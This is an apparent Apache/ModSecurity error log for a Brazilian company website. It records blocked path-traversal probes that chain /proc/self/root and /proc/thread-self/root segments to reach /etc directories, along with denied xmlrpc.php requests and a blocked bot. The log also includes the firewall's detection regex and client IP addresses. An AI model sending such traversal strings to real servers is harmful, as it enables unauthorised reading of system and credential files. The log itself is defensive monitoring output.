[Tue Mar 17 10:47:08.599266 2026] [access_compat:error] [pid 1731:tid 140411658000128] [client 223.165.69.56:61471] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:47:08.601675 2026] [access_compat:error] [pid 11293:tid 140411548894976] [client 223.165.69.56:61472] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:47:09.011981 2026] [:error] [pid 1731:tid 140411708356352] [client 74.7.243.203:38282] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbXQb2qCuy5irgBMjPtwAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:47:16.079344 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.243.203:38732] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbZNCmCSWTlPouqorT9gAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:47:47.574599 2026] [:error] [pid 1731:tid 140411683178240] [client 74.7.243.203:38748] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbgwb2qCuy5irgBMjP0wAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:47:54.294635 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.243.203:39170] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbigeiSKl8TjouI-YJMAAAA88"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:47:59.509423 2026] [:error] [pid 18380:tid 140411683178240] [client 74.7.241.46:35864] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbj64xEDsg_V3ESNY7bAAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:48:18.484457 2026] [:error] [pid 18709:tid 140411582465792] [client 74.7.243.203:43318] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbojarLhPAjZGI1b21xwAAA5M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:48:24.197798 2026] [:error] [pid 17965:tid 140411540502272] [client 74.7.243.203:35466] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbqKt8Nd0UC_OcbVG3JgAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:48:28.905942 2026] [:error] [pid 17965:tid 140411716749056] [client 74.7.243.203:45756] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbrKt8Nd0UC_OcbVG3KwAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:48:30.287405 2026] [:error] [pid 18380:tid 140411607643904] [client 74.7.243.203:39792] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbrq4xEDsg_V3ESNY7fQAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:48:40.608420 2026] [:error] [pid 18709:tid 140411540502272] [client 74.7.241.46:59952] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbuDarLhPAjZGI1b21zQAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:48:46.355477 2026] [:error] [pid 11293:tid 140411708356352] [client 74.7.241.46:52026] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbvtCmCSWTlPouqorUEAAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:49:03.875021 2026] [:error] [pid 17965:tid 140411574073088] [client 74.7.243.203:39808] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbz6t8Nd0UC_OcbVG3TQAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:49:06.339525 2026] [:error] [pid 2325:tid 140411741927168] [client 74.7.243.203:36990] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablb0u82sZHvlq4xgHrLKQAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:49:18.083247 2026] [:error] [pid 18604:tid 140411616036608] [client 74.7.244.31:45980] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablb3kBd0UqwxWindINwCwAAA08"]
[Tue Mar 17 10:49:34.882840 2026] [:error] [pid 2325:tid 140411699963648] [client 74.7.241.46:52038] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablb7u82sZHvlq4xgHrLYgAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:49:45.304182 2026] [:error] [pid 18380:tid 140411632822016] [client 74.7.241.46:37760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablb-a4xEDsg_V3ESNY7mQAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:50:04.548269 2026] [:error] [pid 18604:tid 140411582465792] [client 74.7.241.46:47006] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcDEBd0UqwxWindINwLgAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:50:15.148325 2026] [:error] [pid 2325:tid 140411624429312] [client 74.7.243.203:36994] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcF-82sZHvlq4xgHrLhgAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:50:17.440499 2026] [:error] [pid 18604:tid 140411565680384] [client 74.7.243.203:55364] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcGUBd0UqwxWindINwNAAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:50:22.127594 2026] [:error] [pid 18380:tid 140411741927168] [client 74.7.243.203:55372] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcHq4xEDsg_V3ESNY7pQAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:50:23.512429 2026] [access_compat:error] [pid 2473:tid 140411666392832] [client 108.136.165.222:59147] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:50:23.525497 2026] [access_compat:error] [pid 17965:tid 140411699963648] [client 108.136.165.222:59148] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:50:25.767527 2026] [:error] [pid 18604:tid 140411632822016] [client 74.7.243.203:41098] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablcIUBd0UqwxWindINwQAAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
